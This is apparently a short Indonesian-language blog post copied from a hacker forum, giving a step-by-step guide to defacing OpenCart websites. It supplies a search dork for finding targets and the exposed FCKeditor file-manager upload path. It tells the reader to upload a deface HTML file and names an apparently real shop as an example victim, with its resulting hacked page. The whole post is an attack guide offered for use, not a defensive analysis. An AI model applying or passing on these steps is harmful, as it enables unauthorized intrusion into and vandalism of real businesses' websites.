Translate

Remote Upload. OpenCart Deface

dork : Powered By OpenCart site:com

"site:" terserah, yang penting support opencart

ex target: http://www.harleypartsintl.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/

nah kalo dh dpt trget, lngsung aj kita inject exploitnya

for exploit :
Quote:
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

jdi nya gni
ex: http://www.harleypartsintl.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
Code:
"file uploaded with no errors"

liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"

skrng liat hasilnya....

ex hasil: http://www.harleypartsintl.com/hacked2.htm

sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..

sumber : http://hacker-newbie.org/showthread.php?tid=6783


AldyFrz

No comments:

Post a Comment